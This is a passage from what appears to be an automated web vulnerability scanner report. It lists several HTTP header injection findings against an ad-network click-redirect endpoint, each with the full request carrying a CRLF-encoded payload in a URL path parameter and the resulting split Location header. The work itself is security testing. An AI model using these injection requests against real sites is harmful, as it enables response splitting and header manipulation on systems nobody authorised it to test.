User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=alnFcitZdPuoP7SpZcnDoOn6TC7uVaZblA87K1ygXXv1hWyZaf6EZanRaimVUiRN9IbgAkGg1BT4ERS3XZcApBAXusAVvGZcoKa4EAukyTAwZbPf3HZdeC8vRYsIZcwZbZbUlgcN17mim2cl70fJkJwnjyrRiaFjJTj5AlqOgFxPsTZdKcBPPFy1E6fwLqpGxi9onku2jjrqPS7qCZdNfnbJO7GERA1QwZbrkeuZaUT1wAnc8ySSuWOL3Jtpb9Rcu3S39uIXFNn01LQaWZdC9iyhIvC0ZbknWZcQXR0tlMxfJmpcMAC97ZdcvmeKLQODif6ZdG7y2ctqYntktTY6OZdZa8mshXKl4ck1BSZb2lKT7klwBFJfMZbdVF2iIGAKZdiEFV3bPZdw5NP5f6ZcFPSHwyOOb8gSMsEDQnmSHnZbkig3GMvCIigs6ulENmaycQTcurSodUla5pait3bVC5lhwvgaUVhvaIyVqL9FqUQEvQisFHIVu45xE1LJphA4FDoKHU9w2Vew94uwRQTCFSdxpb5paFIh0iGq2FsEVqZdYt4BwtpaC3vGYElrE6URJtgWj7w1xkOyN8Za9aKagS1nu3phSDlfyp9GK8K; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:45:05 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/10f5a
7f475f239a3/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 19 is copied into the Location response header. The payload 6077c%0d%0a81e460d100 was submitted in the REST URL parameter 19. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/6077c%0d%0a81e460d100 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a8nFciw5EGs6aIN4eHsZcnCPD7kSFUw68IIYkNKVhxIVjvsZcHY2wEvLSH2qw8AnEmZcAfwuRuTgnXvgZdt9fFMRZbj0V8xHtsZbZdf8MNpRHneQdLvCCmDM2BgwLjFtpkjDrq2XnZbXn9ZclgATAF6mDiGZagUPiZdqBUgoLOBRnZax8Wxn6OrmXkue2FEXTAoWoZc4vZbVmQ1BmAd1l9AJNrZcZcX8ShpZavel4nj0NZdQpBN0XRPtxYyospZbkUoQtPZah3Zbuv5uZalknSKBDSuKcXjy4Mhg04I2VhtZbvwf5rRNe6CK9Zbqj8cXhoNRYsZcZaSZaTypZashBQgs2ZbZcZdlK7QZdjN0Wy9ZdOZcWlroZdmiUZagjZaEwWTetJ3GxkKhZc6aBH3FY44rtq5lA43J1T8exZdZbZdBajZd9bUu48ljIOiITB7MDXXEWr67AlTBOWUCZbYPP2Sjecy1RkTbGVaDYfkYJ6T4LMc6YPck9E631Zc1YVOELZcQ49dr7k0LTtcUEhRZcUqXx2NbMttRvDYnHblGobQwSSXGggumvZaQIAcnTTdHFNGpGG2vP2bt6a6yPLbNF9p0uwOK9P7YZcZagnQVJB4YMclj7vweMG765; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:45:26 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/6077c
81e460d100
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 316e2%0d%0af3f106cb4ed was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/316e2%0d%0af3f106cb4ed/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aRnF4hPMEdFSjCwBef8I0gm5VadJOZcy3pKX18hGZbSZbqUxaveZawfddpQuDNIfC3OREqrfpLZaBeChv6aZdUpnZa6Zc6QDZboRfDjxl9qKo4wLeWV60kYaYWZap86Xc8idnZdbmCUGcXswTrLPBgw42MxK4nZbl3UCmB2GghWkU1KO2ZbQPgHYgYUbZdRnZbReLJwSZaXLJXtHJg0rJXiYgZaOQu7txG4keeCd7gf0HZap5BiqP3LAQA8Om9chv2kZdBuZdWgvZdh3XFISlErhlkMZdrqyEXfwpWX1cNWwCYkV5xmN4ZaEUjloIJJCNlZajgTlrKKFaIJPEcftBuL1srMqBjpd9a5YbvpcB3di50dE8ytmsW9cJIJMJT9f6uZdReXcuZa9UfonhcbqaQWmZbWkeavjKdxHRXmfSdRBr4uJuoFOUUl4DgWJ3Zb3d40uHy4yIj0I8YCsVneFCZdrOpDxEGiqSqKaI4xufHSZaQJFpZbT8IQXCNaedBUZdInWFmJYY4BecpABext95BF6MOcN86NZcktHfh6rwLNZd8ZdeZdwb0c1NasR0VPMLZc1dbe7OL8KpVZboeswZcIAPmNgpZbcUrxhDDiqJZcoUZcuZbZb; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:48 GMT;
Content-Type: text/html
Location: 316e2
f3f106cb4ed/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 6ef98%0d%0adf03781253c was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/6ef98%0d%0adf03781253c/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ahnFcim5abw6yuoZbUjT4fqUDUD2sYQZdDZaWW5gcOxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRm7xqnMnbNZckbcJL08tom0uWyJjGe8Zdt6BlH3Zcgcsh0fhhxv3ZaQZcwFXZaO9JVcJ3us2ZdEZbqUeIufqjSpys4WJ0ZcM4mr6MsaUrZcq3FYXmmEoyQZaT2oCpbp7Sa9R3qwWor4D8Mm5YBh4FmTZcWSQ7hJWm31vxvGWRZa3SsmDNZaVkIf3uNYZdH07L4Zb632iXZb5RMp0VZbrsqxlxyw3ow7oDZd9ZcyDFvZcZdISGupYxFlZdGTedF3YrCZbsI29LLgZb64fS3HpZdNWhR4iVJVPFdYnvjeFPyaFWKucrZb0ukZaVMI4M8GnDhZcLjB62RKcsZcYlCGYq7r2n2E9PAK2B2cAuH5TisoBYDXXdwsveeXFZdTUQSh0pKlUfsTtDhc1AD8HslNHTc2Wp4AC76IweAyWhdU4WwxQsXfq8r0ccNZatni0MOVxpVcWDaCCqL7qmnSu7YYaY3cpZanhZacfaXqwl2VhmD2ZbMSVxLLBuZdFTgfK98Zay4Kk1CFEZaNbXNwrZbNymgAdM0jUGq8N; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:04 GMT;
Content-Type: text/html
Location: http:/6ef98
df03781253c/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload e29cc%0d%0a7ba6994efad was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/e29cc%0d%0a7ba6994efad/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a8nFkjw5EGs6aIN4eHsZcnCPD7kSFUw68IIYkNKVhxIVjvsZcHY2wEvLSH2qw8AnEmZcAfwuRuTgnXvgZdt9fFMRZbj0V8xHtsZbZdf8MNpRHneQdLvCCmDM2BgwLjFtpkjDrq2XnZbXn9ZclgATAF6mDiGZagUPiZdqBUgoLOBRnZax8Wxn6OrmXkue2FEXTAoWoZc4vZbVmQ1BmAd1l9AJNrZcZcX8ShpZavel4nj0NZdQpBN0XRPtxYyospZbkUoQtPZah3Zbuv5uZalknSKBDSuKcXjy4Mhg04I2VhtZbvwf5rRNe6CK9Zbqj8cXhoNRYsZcZaSZaTymZaZa4fUZdn55fgPhUZafvNIb5EHiS3pZd0xrDZbl5qeTx9K9OkjVMMJTSZb9PCmlWrjthZcvkj8ParRPNrujINEMpZb0GJfK39cngwefpnUZdLMBx9mPIv8BIKlMRZc4lP3wqAj5mC1ViP7YotUKZbTqRusc9VtnDc0LWvdj5TfwNauODJ0oSxacS8pwZa9gcPPVJCDWoPGfMQHrCpS1nUK0mCPl6S8OS9nbje3VXK2doscOswpBU2j3HBmIBFMHVwFWZcjYk2Ey7iuYKY7Yq95yx27ul2Cap; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:29 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/e29cc
7ba6994efad/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 3a728%0d%0a6b904cbb811 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/3a728%0d%0a6b904cbb811/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aNnFkjyg6AOUA7ujQFNyvZdqnyZd0R3qZd7qY33CYXJDV1ff6FEMS5bvSWWUbuQPP8akkJeXjYFRwUI5WuSuWrEQqrcdElVheZcxZdXuRZcvQw3rI2ZcYT7TkCMKqbaxZac4WhOZdvvEKBVZb0Zc64BZb8X9mNIZdZaTh1yU040bMoN2cu45S9faOWalW4Xk7uyWWscbQjFFuBk8wr9ZbDpvrnHKjWP5Ru4B2Zb2YnW4oqtDkuXETyrXvXWoqi2ninW2tgK4f6wKdy175NDqF16jJwWIZdD2jn44YOA3IqNyFscZdBsoJHQnewSipVJ6FZdtDn3mTZaZc6EZbCZdNZdNmFr4JG5Y3TJsYLRD4Ip95TAlnWy0Nl9jDIP27tqBBnSdyqpWEFeYJQbD21M7E6NhZaAtVZbGZcl8f9LU7ZcQsCiZagrR1DfZcZdL4RxUZdhLsdUAHFbt7x1sfqU8pBJnroM93YFEBnoD8rwdIOfeZdqsU7c5xCKGwW5EwZdsOcsn8bNHjh9wnWmAKTZdVBv7cASRZaQ3vH6ebMPI3CaKtbuPJB1b7ITUwxCZbh1wV3RC4xPqxMVpbkaIS4xRjuLYAi630Pm1HoCGlydBl2f8f; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:31 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/3a728
6b904cbb811/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 7265f%0d%0a8acca6d500f was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/7265f%0d%0a8acca6d500f/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
